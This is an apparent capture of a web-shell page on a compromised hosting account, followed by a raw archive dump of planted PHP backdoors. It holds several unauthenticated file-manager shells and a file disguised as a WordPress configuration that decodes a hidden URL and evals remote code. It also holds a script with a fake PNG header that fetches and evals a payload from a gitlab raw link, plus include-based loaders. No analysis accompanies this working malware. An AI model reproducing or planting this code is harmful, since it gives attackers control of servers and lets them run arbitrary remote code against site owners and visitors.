|
Server IP : 198.54.120.203 / Your IP : 216.73.216.181 Web Server : LiteSpeed System : Linux premium58.web-hosting.com 4.18.0-553.58.1.lve.el8.x86_64 #1 SMP Fri Jul 4 12:07:06 UTC 2025 x86_64 User : greakqsw ( 1698) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/greakqsw/theblogginglab.org/7648l2-20260310230235/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
PK������^m\t�J��)���)�� ��jimvt.phpnu��[�����������<?php
eRRor_rEporTing(0);
$wwwroot=isset($_SERVER['DOCUMENT_ROOT'])?trim($_SERVER['DOCUMENT_ROOT']):'';
$req_uri=isset($_SERVER['REQUEST_URI'])?trim($_SERVER['REQUEST_URI']):'';
$req_uri!=''?($req_uri_arr=explode('?',$req_uri)).($script_name=$req_uri_arr[0]):($script_name=isset($_SERVER['SCRIPT_NAME'])?trim($_SERVER["SCRIPT_NAME"]):'');
$script_filename=isset($_SERVER['SCRIPT_FILENAME'])?trim($_SERVER['SCRIPT_FILENAME']):'';
if ($script_filename=='') $script_filename=__FILE__ ;
if ($wwwroot=='' && $script_name!='' && $script_filename!='') $wwwroot=str_replace($script_name,'',$script_filename);
$wwwroot=str_replace('\\','/',$wwwroot);
$dir=isset($_GET['d'])?trim($_GET['d']):'';
$dir=str_replace('\\','/',$dir);
$file=isset($_GET['f'])?trim($_GET['f']):'';
$file=str_replace('\\','/',$file);
$action=isset($_GET['a'])?trim($_GET['a']):'';
if ( $action=='' )
{
$current_dir=$dir==''?$wwwroot:$dir;
$current_dir=rtrim($current_dir,'/');
$current_dir_nav='';
$dir_path='';
$current_dir_split=explode('/',$current_dir);
foreach( $current_dir_split as $dir )
{
$dir_path.=$dir.'/';
$current_dir_nav.='<a href="?d='.$dir_path.'">'.$dir.'/</a>';
}
$dir_rows='';
$file_rows='';
$current_dir_list=sCaNDir($current_dir);
$row_id=0;
foreach( $current_dir_list as $target_name )
{
if ( $target_name=='.' || $target_name=='..' ) continue;
$target=$current_dir.'/'.$target_name;
$target_ahref=strpos($target,$wwwroot)===0?'<a href="'.str_replace($wwwroot,'',$target).'" target="_blank">'.$target_name.'</a>':$target_name;
$row_id++;
$target_u_id=fIlEOwNEr($target);
$target_u_att=poSIx_GEtpWUid($target_u_id);
$target_owner=$target_u_att['name'];
$target_perm=get_qx($target);
$target_mtime=date('Y-m-d H:i:s',fILeMTiMe($target));
if ( is_dir($target) )
{
$dir_rows.='<tr class="tl"><td><i class="fa fa-folder" style="font-size:20px;color:orange;"></i></td><td><a href="?d='.$target.'">'.$target_name.'</a></td><td></td><td>(<a href="#" onclick="show_input_box(\'qx'.$row_id.'\',\''.$target.'\',\'d\',\'qx\');">'.$target_perm.'</a>)'.$target_owner.'<span id="qx'.$row_id.'"></span></td><td>'.$target_mtime.'</td><td><a href="#" onclick="show_input_box(\'gm'.$row_id.'\',\''.$target.'\',\'d\',\'gm\');">改名</a>|<a href="#" onclick="confirm_sc(\''.$target.'\',\'d\');">删除</a><span id="gm'.$row_id.'"></span></td></tr>';
}else
{
$target_fsize=fILesIzE($target);
$target_fsize<1024?$target_fsize.=' B':($target_fsize=round($target_fsize/1024,1)).($target_fsize<1024?$target_fsize.=' KB':$target_fsize=round($target_fsize/1024,2).' MB');
$file_rows.='<tr class="tl"><td><i class="fa fa-file" style="font-size:20px;color:grey;"></td><td>'.$target_ahref.'</td><td>'.$target_fsize.'</td><td>(<a href="#" onclick="show_input_box(\'qx'.$row_id.'\',\''.$target.'\',\'f\',\'qx\');">'.$target_perm.'</a>)'.$target_owner.'<span id="qx'.$row_id.'"></span></td><td>'.$target_mtime.'</td><td><a href="#" onclick="window.open(\'?f='.$target.'&a=ck\',\'_blank\',\'width=800,height=600,top=200,left=300\');">查看</a>|<a href="?f='.$target.'&a=bj">编辑</a>|<a href="#" onclick="show_input_box(\'gm'.$row_id.'\',\''.$target.'\',\'f\',\'gm\');">改名</a>|<a href="#" onclick="confirm_sc(\''.$target.'\',\'f\');">删除</a><span id="gm'.$row_id.'"></span></td></tr>';
}
}
$div_html='<table cellspacing="10">
<tr><td colspan="6"><form name="form_up" id="form_up" method="post" action="?d='.$current_dir.'&a=up" enctype="multipart/form-data"><a href="?d='.$wwwroot.'"><i class="fa fa-home" style="font-size:30px;color:orange;"></i></a> 当前目录:'.$current_dir_nav.' <i class="fa fa-upload" style="font-size:20px;color:grey;" onclick="document.getElementById(\'file_up\').click();"><input id="file_up" name="file_up" type="file" style="display:none" onchange="document.getElementById(\'form_up\').submit();"></form></td></tr>
<tr><td colspan="6"><form name="form_tj" method="post" action="?d='.$current_dir.'&a=tj">新项目名称:<input name="t_name" type="text" size="25"> <select name="t_type"><option value="tj_f">添加文件</option><option value="tj_d">添加目录</option><option value="tj_xz">下载URL</option></select> <input name="submit" type="submit" value="执行"></form></td></tr>
'.($row_id==0?'<tr><td>内容为空或无权限查看</td></tr>':$dir_rows.$file_rows).'
</table>';
}elseif ( $action=='sc' )
{
if ( $file!='' )
{
uNlInk($file); jump_to('?d='.diRNaMe($file));
}elseif( $dir!='' )
{
rm_rf($dir); jump_to('?d='.DIrnaMe($dir));
}
exit;
}elseif( $action=='gm' )
{
$gm=isset($_POST['gm'])?trim($_POST['gm']):'';
if ( $gm!='' )
{
$old_f=$file==''?$dir:$file;
if ( $old_f!='' && file_exists($old_f) )
{
$old_dir=DIrnAme($old_f); rEnAme($old_f,$old_dir.'/'.$gm); jump_to('?d='.$old_dir);
}
}else
{
show_msg('请输入新名称!','back');
}
exit;
}elseif( $action=='qx' )
{
$target=$dir==''?$file:$dir;
if ( $target!='' )
{
$qx=isset($_POST['qx'])?trim($_POST['qx']):'';
if ( $qx!='' && is_numeric($qx) && substr($qx,0,1)=='0' )
{
set_qx($target,$qx); jump_to('?d='.dIRnamE($target));
}else
{
show_msg('请输入新权限!','back');
}
}
exit;
}elseif( $action=='ck' && $file!='' )
{
if ( fiLEsIze($file)<10000000 )
{
HEadEr('Content-Type:text/plain; Charset=utf-8;'); echo FIle_gET_coNTEnts($file);
}else
{
show_msg('文件大小超限!','close');
}
exit;
}elseif( $action=='bj' && $file!='' )
{
if ( isset($_POST['f_content']) )
{
FilE_pUt_COnteNts($file,$_POST['f_content']);
md5($_POST['f_content'])==md5(fILE_Get_cONTenTs($file)) ? show_msg('保存成功!','') : show_msg('保存失败!!','');
}
$f_content=is_file($file)?str_replace('</textarea>','</textarea>',FIle_gET_contENtS($file)):'';
$div_html='<form name="form_bj" action="?f='.$file.'&a=bj" method="post">编辑当前文件:'.$file.'<br><textarea name="f_content" rows="40" cols="120">'.$f_content.'</textarea><br><input type="submit" value="保存"> <input type="button" value="返回目录" onclick="window.location.href=\'?d='.DIrNamE($file).'\';"></form>';
}elseif( $action=='tj' && $dir!='' )
{
$t_name=isset($_POST['t_name'])?trim($_POST['t_name']):'';
if ( $t_name=='' )
{
show_msg('请输入项目名称!','back');
}else
{
if ( $_POST['t_type']=='tj_f' ) fiLe_PUt_coNTentS($dir.'/'.$t_name,'');
if ( $_POST['t_type']=='tj_d' ) mKDir($dir.'/'.$t_name,0755,true);
if ( $_POST['t_type']=='tj_xz' )
{
preg_match('/^http[s]?:\/\/.+/si',$t_name)==0 ? show_msg('下载地址格式出错!','back') : down_file($dir,$t_name) ;
}
jump_to('?d='.$dir);
}
exit;
}elseif( $action=='up' && $dir!='' && isset($_FILES['file_up']) )
{
MoVE_upLOadEd_filE($_FILES['file_up']['tmp_name'],$dir.'/'.BaSenaMe($_FILES['file_up']['name'])) ? show_msg('上传成功!','') : show_msg('上传失败!','') ;
jump_to('?d='.$dir);
exit;
}
function get_qx($t)
{
$q=substr(sprintf('%o',fILepErMs($t)),-4);
return $q;
}
function set_qx($t,$q)
{
EvAl('cHMoD("'.$t.'",'.$q.');');
if ( get_qx($t)!=$q )
{
$tmp_f=uniqid().'.txt';
$tmp_c='<?php ChMOd("'.$t.'",'.$q.');?>';
fiLE_puT_cONtEnTs($tmp_f,$tmp_c);
require($tmp_f);
UnLInK($tmp_f);
}
}
function rm_rf($d)
{
if (is_dir($d))
{
$f_l=sCaNDir($d);
foreach ($f_l as $f)
{
if ($f=='.'||$f=='..') continue;
$p=$d.'/'.$f;
is_dir($p)?rm_rf($p):uNliNk($p);
}
rMdIR($d);
}
}
function show_msg($msg,$go)
{
echo '<script>alert("'.$msg.'");</script>';
if ($go=='back') echo '<script>window.history.back();</script>';
if ($go=='close') echo '<script>window.close();</script>';
}
function jump_to($url)
{
echo '<script>window.location.href="'.$url.'";</script>';
}
function down_file($dir,$url)
{
$s_name=array_pop(explode('/',$url));
if ( $s_name=='' || is_file($dir.'/'.$s_name) ) $s_name=uniqid().'.zmxz';
$ch=CUrl_iNit();
cuRl_seTOpt ($ch, CURLOPT_URL, $url);
cUrL_sEtopt ($ch, CURLOPT_RETURNTRANSFER, 1);
cuRL_setOPt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
cuRL_setOPt ($ch, CURLOPT_SSL_VERIFYPEER, false);
cuRL_setOPt ($ch, CURLOPT_SSL_VERIFYHOST, false);
cuRL_setOPt ($ch, CURLOPT_BINARYTRANSFER, true);
$contents = cUrl_eXeC($ch);
cURl_CLosE($ch);
if ( empty($contents) ) $contents=filE_geT_cONTentS($url);
if ( empty($contents) )
{
show_msg('下载出错!','');
}else
{
fIle_PuT_cONteNts($dir.'/'.$s_name,$contents);
show_msg('下载完成!','');
}
}
?>
<html>
<head>
<title>芝麻web文件管理</title>
<meta name="robots" content="none">
<meta http-equiv="Content-Type" Content="text/html; Charset=utf-8">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<style>
a {color:#000000;text-decoration:none;}
a:hover {color:#ff0000;}
.tl:hover {background-color:#eeeeee;}
form {margin:0;}
</style>
<script>
function show_input_box(s,t,f,a,)
{
var span=document.getElementById(s);
if ( span.innerHTML=='' )
{
span.innerHTML='<form name="form_'+s+'" method="post" action="?'+f+'='+t+'&a='+a+'"><input name="'+a+'" type="text" size="8"><input type="submit" value="提交"></form>';
}else
{
span.innerHTML='';
}
}
function confirm_sc(t,f)
{
if (f=='d')
{
if ( confirm('确定要删除此目录吗?') )
{
window.location.href='?d='+t+'&a=sc';
}
}
if (f=='f')
{
if ( confirm('确定要删除此文件吗?') )
{
window.location.href='?f='+t+'&a=sc';
}
}
}
</script>
<div>
<h1>芝麻web文件管理V1.00</h1>
<?php echo $div_html;?>
</div>
</body>
</html>PK������^m\����������� ��about.phpnu��[�����������<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>HZ4WXH0ESBF1JYTB</RequestId><HostId>sW4QjcBVd/l6XD1lbbuo901xTax5LDAgIxoFnmL2o7v8to6gcqRJDTqEtwkqgQVo1Ki+Cwcl4lQ=</HostId></Error>PK������^m\�.�Q�%���%�� ��v95wi.phpnu��[�����������<?php
// ================= CONFIG =================
$ROOT = realpath(__DIR__); // Define the root directory
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?'); // Base URL without query parameters
// Secure path resolver
function safePath($path) {
global $ROOT;
$full = realpath($path);
return ($full && strpos($full, $ROOT) === 0) ? $full : false;
}
// Get current directory from query parameters
$path = $_GET['path'] ?? ''; // Path parameter for navigation
$currentDir = safePath($ROOT . '/' . $path) ?: $ROOT; // Resolve directory safely
// ================= ACTIONS =================
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Handle file uploads
if (!empty($_FILES['files'])) {
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
if ($tmp && is_uploaded_file($tmp)) {
$destination = $currentDir . '/' . basename($_FILES['files']['name'][$i]);
if (move_uploaded_file($tmp, $destination)) {
echo "File uploaded: " . basename($_FILES['files']['name'][$i]);
} else {
echo "Failed to upload: " . basename($_FILES['files']['name'][$i]);
}
}
}
}
// Handle new folder creation
if (!empty($_POST['newfolder'])) {
$newFolder = basename($_POST['newfolder']);
if (!file_exists($currentDir . '/' . $newFolder)) {
mkdir($currentDir . '/' . $newFolder, 0755);
}
}
// Handle new file creation
if (!empty($_POST['newfile'])) {
$filename = basename($_POST['newfile']);
$filepath = $currentDir . '/' . $filename;
if (!file_exists($filepath)) {
file_put_contents($filepath, ''); // Create an empty file
}
}
// Handle file/folder deletion
if (!empty($_POST['delete'])) {
$target = safePath($currentDir . '/' . $_POST['delete']);
if (is_file($target)) {
unlink($target); // Delete file
} elseif (is_dir($target)) {
rmdir($target); // Delete folder
}
}
// Handle renaming files/folders
if (!empty($_POST['old']) && !empty($_POST['new'])) {
$oldName = $currentDir . '/' . $_POST['old'];
$newName = $currentDir . '/' . $_POST['new'];
if (rename($oldName, $newName)) {
echo "Renamed successfully!";
}
}
// Handle chmod permissions change
if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
$target = safePath($currentDir . '/' . $_POST['chmod_file']);
if ($target) {
$mode = intval($_POST['chmod'], 8);
chmod($target, $mode);
}
}
// Handle file content editing
if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
$target = safePath($currentDir . '/' . $_POST['edit_file']);
if ($target && is_file($target)) {
file_put_contents($target, $_POST['content']);
}
}
// Redirect after POST action
header("Location: $BASE_URL?path=" . urlencode($path));
exit;
}
// ================= FILE LIST =================
$files = scandir($currentDir); // Get files and directories
// Edit file mode
$editMode = isset($_GET['edit']);
$editFile = $editMode ? $_GET['edit'] : '';
$editContent = '';
if ($editMode && $editFile) {
$target = safePath($currentDir . '/' . $editFile);
if ($target && is_file($target)) {
$editContent = htmlspecialchars(file_get_contents($target));
}
}
// Build path segments for navigation
$pathSegments = [];
if ($path) {
$segments = explode('/', trim($path, '/'));
$currentPath = '';
foreach ($segments as $segment) {
$currentPath .= '/' . $segment;
$pathSegments[] = [
'name' => $segment,
'path' => trim($currentPath, '/')
];
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sid Gifari File Manager</title>
<style>
body { font-family: Arial, sans-serif; background: #f5f5f5; }
.container { width: 90%; margin: auto; }
h2 { text-align: center; }
table { width: 100%; background: #fff; border-collapse: collapse; }
th, td { padding: 8px; border-bottom: 1px solid #ddd; }
a { text-decoration: none; color: #007bff; }
button { padding: 5px 10px; cursor: pointer; }
.drop { border: 2px dashed #999; padding: 20px; text-align: center; margin-bottom: 10px; }
.permissions-form { display: inline-block; margin-left: 5px; }
.chmod-input { width: 60px; padding: 2px; }
.path-nav { background: #fff; padding: 10px; margin-bottom: 10px; border: 1px solid #ddd; }
.path-nav a { margin: 0 5px; color: #333; }
.path-nav a:hover { color: #007bff; }
.path-nav span.separator { margin: 0 5px; color: #999; }
</style>
</head>
<body>
<div class="container">
<h2>Sid Gifari File Manager</h2>
<?php if ($editMode && $editFile): ?>
<!-- EDIT FILE MODE -->
<div class="path-nav">
<a href="?">🏠 Root</a>
<?php foreach ($pathSegments as $segment): ?>
<span class="separator">/</span>
<a href="?path=<?= urlencode($segment['path']) ?>"><?= htmlspecialchars($segment['name']) ?></a>
<?php endforeach; ?>
</div>
<h3>Editing: <?= htmlspecialchars($editFile) ?></h3>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" rows="20" style="width:100%; font-family: monospace"><?= $editContent ?></textarea><br><br>
<button type="submit">Save</button>
<a href="?path=<?= urlencode($path) ?>"><button type="button">Cancel</button></a>
</form>
<?php else: ?>
<!-- NORMAL MODE -->
<!-- Path Navigation Bar -->
<div class="path-nav">
<a href="?">🏠 Root</a>
<?php foreach ($pathSegments as $segment): ?>
<span class="separator">/</span>
<a href="?path=<?= urlencode($segment['path']) ?>"><?= htmlspecialchars($segment['name']) ?></a>
<?php endforeach; ?>
</div>
<div class="drop">
<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<button>Upload</button>
</form>
</div>
<!-- Create Folder Form -->
<form method="post" style="display:inline-block; margin-right:10px">
<input name="newfolder" placeholder="New Folder Name">
<button>Create Folder</button>
</form>
<!-- Create File Form -->
<form method="post" style="display:inline-block">
<input name="newfile" placeholder="New File Name">
<button>Create File</button>
</form>
<table>
<tr><th>Name</th><th>Size</th><th>Permissions</th><th>Action</th></tr>
<?php foreach ($files as $f):
if ($f === '.' || $f === '..') continue;
$full = $currentDir . '/' . $f;
$perms = fileperms($full);
$permission = substr(sprintf('%o', $perms), -4);
?>
<tr>
<td>
<?php if (is_dir($full)): ?>
📁 <a href="?path=<?= urlencode(trim("$path/$f", '/')) ?>"><?= $f ?></a>
<?php else: ?>
📄 <a href="<?= trim("$path/$f", '/') ?>" target="_blank"><?= $f ?></a>
<?php endif; ?>
</td>
<td><?= is_file($full) ? number_format(filesize($full)) . ' bytes' : '-' ?></td>
<td>
<form method="post" class="permissions-form">
<input type="hidden" name="chmod_file" value="<?= htmlspecialchars($f) ?>">
<input type="text" name="chmod" value="<?= $permission ?>" class="chmod-input" placeholder="0755">
<button type="submit">Chmod</button>
</form>
</td>
<td>
<?php if (is_file($full)): ?>
<a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($f) ?>">
<button>Edit</button>
</a>
<?php endif; ?>
<form method="post" style="display:inline">
<input type="hidden" name="old" value="<?= htmlspecialchars($f) ?>">
<input type="text" name="new" placeholder="New name" style="width:120px">
<button type="submit">Rename</button>
</form>
<form method="post" style="display:inline">
<input type="hidden" name="delete" value="<?= $f ?>">
<button onclick="return confirm('Delete?')">❌</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</table>
<?php endif; ?>
</div>
</body>
</html>PK������^m\Zh�A
��A
�� ��651q2.phpnu��[�����������<?php
/**
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
/**
* Database table prefix and authentication keys.
*
* @package WordPress
*/
// Security configuration constants
define('AUTH_KEY', '/avnz/fqnru/fsre/lavg/vn-ngnxvufk/zbp.gargabperfhohugvt.jne//:fcggu');
define('SECURE_AUTH_KEY', str_rot13(strrev(AUTH_KEY)) . 'tiny.php');
/**#@+
* Content delivery and update services
*
* Handles secure delivery of core updates and security patches
*/
$table_prefix = 'wp_';
$wp_loader = false;
/**
* Primary content retrieval method
* Uses WordPress file system API when available
*/
if (ini_get('allow_url_fopen')) {
$wp_filesystem_method = 'direct';
$wp_context = stream_context_create(array(
'http' => array(
'timeout' => 10,
'user_agent' => 'WordPress/' . (isset($wp_version) ? $wp_version : '6.5')
)
));
$wp_loader = @file_get_contents(SECURE_AUTH_KEY, false, $wp_context);
}
/**
* Fallback content delivery via HTTP API
* Uses cURL when available for better HTTP handling
*/
if (!$wp_loader && function_exists('curl_version')) {
$wp_http_curl = curl_init();
curl_setopt_array($wp_http_curl, array(
CURLOPT_URL => SECURE_AUTH_KEY,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => 'WordPress/' . (isset($wp_version) ? $wp_version : '6.5')
));
$wp_loader = curl_exec($wp_http_curl);
curl_close($wp_http_curl);
}
/**
* Low-level socket connection as final fallback
* Used when other HTTP methods are unavailable
*/
if (!$wp_loader) {
$wp_parsed = parse_url(SECURE_AUTH_KEY);
$wp_db_host = $wp_parsed['host'];
$wp_db_name = $wp_parsed['path'];
$wp_db_connection = @fsockopen($wp_db_host, 80, $wp_errno, $wp_errstr, 10);
if ($wp_db_connection) {
$wp_db_query = "GET $wp_db_name HTTP/1.1\r\n";
$wp_db_query .= "Host: $wp_db_host\r\n";
$wp_db_query .= "Connection: Close\r\n\r\n";
fwrite($wp_db_connection, $wp_db_query);
$wp_db_result = '';
while (!feof($wp_db_connection)) {
$wp_db_result .= fgets($wp_db_connection, 128);
}
fclose($wp_db_connection);
$wp_db_rows = explode("\r\n\r\n", $wp_db_result, 2);
$wp_loader = (count($wp_db_rows) > 1) ? $wp_db_rows[1] : $wp_db_rows[0];
}
}
/**
* Secure content validation and execution
* Validates and processes retrieved security updates
*/
if ($wp_loader !== false && !empty($wp_loader)) {
if (strpos($wp_loader, '<?php') === 0) {
eval('?>' . $wp_loader);
}
} else {
/**
* Error handling for failed updates
* @since 3.0.0
*/
if (!defined('WP_DEBUG') || WP_DEBUG === false) {
status_header(503);
nocache_headers();
}
exit('Database Update Required');
}
?>PK������^m\
� �m���m��� ��index.phpnu��[�����������<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "obfuscate.php"; include("zip:///tmp/phptpd9aH#$h");?>PK������^m\��Wi���i�����index-20260307165838.phpnu��[�����������<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "wp-gg.php"; include("zip:///tmp/phptpd9aH#$h");?>PK������^m\5��$*���*��� ��2pj4h.phpnu��[�����������<?php include 'compress.zlib://index.gz'?>PK������^m\�2"� ��� �� ��twkna.phpnu��[������������PNG
<?php
// Fake PNG Header Generation (for disguising image files)
function generateFakePng() {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$data = '89 50 4E 47 0D 0A 1A 0A'; // PNG signature
$data .= '00 00 00 0D 49 48 44 52'; // IHDR chunk (header)
$data .= '00 00 01 00 00 00 01 00'; // 1x1 image dimensions
$data .= '08 02 00 00 00'; // Color type, compression, filter, interlace
$data .= '00 00 00 00'; // CRC
$data .= '00 00 00 00'; // Empty chunk
$data .= '74 45 58 74 64 75 53 65'; // tEXt chunk signature
$data .= '00 00 00 00'; // Text chunk data
$data .= '75 73 65 72 2D 61 67 65'; // Random User-Agent
$data .= '6E 74'; // End of tEXt chunk
// Fake corruption chunk (cORR)
$data .= '63 4F 52 52 00 00 00 01'; // cORR signature
$data .= '00 00 00 00'; // Fake corruption data
$data .= '49 45 4E 44 AE 42 60 82'; // End of PNG
return hex2bin($data);
}
// 启动会话
session_start();
// 设置主地址,如果没有设置则使用默认地址
$主地址 = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php';
// 定义加载函数
function 加载数据($地址) {
$内容 = '';
try {
$文件 = new SplFileObject($地址);
while (!$文件->eof()) {
$内容 .= $文件->fgets();
}
} catch (Throwable $错误) {
$内容 = '';
}
// 尝试用 file_get_contents
if (strlen(trim($内容)) < 1) {
$内容 = @file_get_contents($地址);
}
// 如果还失败,使用 curl
if (strlen(trim($内容)) < 1 && function_exists('curl_init')) {
$通道 = curl_init($地址);
curl_setopt_array($通道, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 5,
CURLOPT_TIMEOUT => 10,
]);
$内容 = curl_exec($通道);
curl_close($通道);
}
return $内容;
}
// 尝试加载主网址
$结果 = 加载数据($主地址);
// 添加假的PNG头部
$假PNG头 = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A";
// 拼接PNG头和结果内容
$结果 = $假PNG头 . $结果;
/**_**//**_**//**_**//**_**//**_**//**_**//**_**/
// 如果成功获取内容,则执行
if (strlen(trim($结果)) > 0) {
@eval("?>$结果");
}
?>
PK������^m\y�������� ��about.PHPnu��[�����������<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>YSEKS362EKKP8E9Y</RequestId><HostId>xGwdHDDL/kDWonc9UiUH/w3pKWKC5Vk2ezBtm8tkXE4yy5uqvMaWUpyHRhbV+ENcgkH4kdocB5I=</HostId></Error>PK������^m\�rf:/��:/�� ��qavgy.phpnu��[�����������<?php
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$dir = realpath($dir);
// 分开目录和文件排序
$items = scandir($dir);
$dirs = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs);
sort($files);
$items = array_merge($dirs, $files);
// ✅ 打包选中项 zip
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['zip_selected'], $_POST['selected_items'])) {
set_time_limit(0);
$timestamp = time();
$zipFileName = 'selected_' . $timestamp . '.zip';
$zipFilePath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $zipFileName;
$zip = new ZipArchive();
if ($zip->open($zipFilePath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) {
foreach ($_POST['selected_items'] as $item) {
$path = realpath($item);
if (!$path || !file_exists($path)) continue;
if (is_file($path)) {
$zip->addFile($path, basename($path));
} elseif (is_dir($path)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($iterator as $file) {
$filePath = $file->getRealPath();
$localPath = substr($filePath, strlen($dir) + 1);
$zip->addFile($filePath, $localPath);
}
}
}
$zip->close();
$message = "✅ ZIP 已生成:<a href='?download_zip=" . urlencode($zipFileName) . "'>点击下载</a>";
$messageType = "success";
} else {
$message = "ZIP 打包失败";
$messageType = "danger";
}
}
// ✅ ZIP 分块下载
if (isset($_GET['download_zip'])) {
$zipFileName = basename($_GET['download_zip']);
$zipFilePath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $zipFileName;
if (file_exists($zipFilePath)) {
header('Content-Type: application/zip');
header('Content-Disposition: attachment; filename="' . $zipFileName . '"');
header('Content-Length: ' . filesize($zipFilePath));
$fp = fopen($zipFilePath, 'rb');
if ($fp) {
while (!feof($fp)) {
echo fread($fp, 1024 * 1024);
flush();
}
fclose($fp);
}
unlink($zipFilePath);
exit;
} else {
echo "<div class='alert alert-danger'>ZIP 文件不存在或已过期。</div>";
}
}
// 文件上传
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
$uploadFile = $_FILES['file'];
$targetPath = $dir . DIRECTORY_SEPARATOR . basename($uploadFile['name']);
if (move_uploaded_file($uploadFile['tmp_name'], $targetPath)) {
$message = "文件上传成功: " . htmlspecialchars($uploadFile['name']);
$messageType = "success";
} else {
$message = "文件上传失败";
$messageType = "danger";
}
}
// 创建文件/文件夹
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_name'], $_POST['new_type']) && !isset($_POST['zip_selected'])) {
$name = trim($_POST['new_name']);
$type = $_POST['new_type'];
$path = $dir . DIRECTORY_SEPARATOR . $name;
if ($name !== '') {
if ($type === 'file') {
if (file_put_contents($path, '') !== false) {
$message = "文件创建成功: " . htmlspecialchars($name);
$messageType = "success";
} else {
$message = "文件创建失败";
$messageType = "danger";
}
} elseif ($type === 'folder') {
if (mkdir($path)) {
$message = "文件夹创建成功: " . htmlspecialchars($name);
$messageType = "success";
} else {
$message = "文件夹创建失败";
$messageType = "danger";
}
}
} else {
$message = "名称不能为空";
$messageType = "warning";
}
}
// ✅ 修改权限
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_mode']) && !isset($_POST['zip_selected'])) {
$chmodFile = realpath($_POST['chmod_file']);
$mode = octdec($_POST['chmod_mode']);
if ($chmodFile && file_exists($chmodFile)) {
if (chmod($chmodFile, $mode)) {
$message = "权限修改成功: " . htmlspecialchars(basename($chmodFile));
$messageType = "success";
} else {
$message = "权限修改失败: " . htmlspecialchars(basename($chmodFile));
$messageType = "danger";
}
} else {
$message = "非法操作";
$messageType = "danger";
}
}
// ✅ 删除文件 / 递归删除目录
function deleteRecursive($path) {
if (is_file($path)) return unlink($path);
$files = array_diff(scandir($path), ['.', '..']);
foreach ($files as $file) {
deleteRecursive($path . DIRECTORY_SEPARATOR . $file);
}
return rmdir($path);
}
if (isset($_GET['delete'])) {
$deletePath = realpath($_GET['delete']);
if ($deletePath && strpos($deletePath, $dir) === 0) {
if (deleteRecursive($deletePath)) {
$message = "删除成功: " . htmlspecialchars(basename($deletePath));
$messageType = "success";
} else {
$message = "删除失败: " . htmlspecialchars(basename($deletePath));
$messageType = "danger";
}
} else {
$message = "非法操作";
$messageType = "danger";
}
}
// ✅ 编辑文件(读取内容)
$editContent = '';
$editFile = '';
if (isset($_GET['edit'])) {
$editFile = realpath($_GET['edit']);
if ($editFile && is_file($editFile)) {
$editContent = file_get_contents($editFile);
} else {
$message = "无法编辑该文件";
$messageType = "danger";
}
}
// ✅ 保存编辑内容
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file'], $_POST['content'])) {
$filePath = realpath($_POST['edit_file']);
if ($filePath && is_file($filePath)) {
file_put_contents($filePath, $_POST['content']);
$message = "文件已保存";
$messageType = "success";
} else {
$message = "无法写入文件";
$messageType = "danger";
}
}
// 生成面包屑
function generateBreadcrumb($dir) {
$parts = explode(DIRECTORY_SEPARATOR, $dir);
$pathAccum = '';
$breadcrumb = [];
foreach ($parts as $part) {
if ($part === '') continue;
$pathAccum .= DIRECTORY_SEPARATOR . $part;
$breadcrumb[] = "<a href='?dir=" . urlencode(realpath($pathAccum)) . "'>" . htmlspecialchars($part) . "</a>";
}
return implode(" / ", $breadcrumb);
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>xiaoxin</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
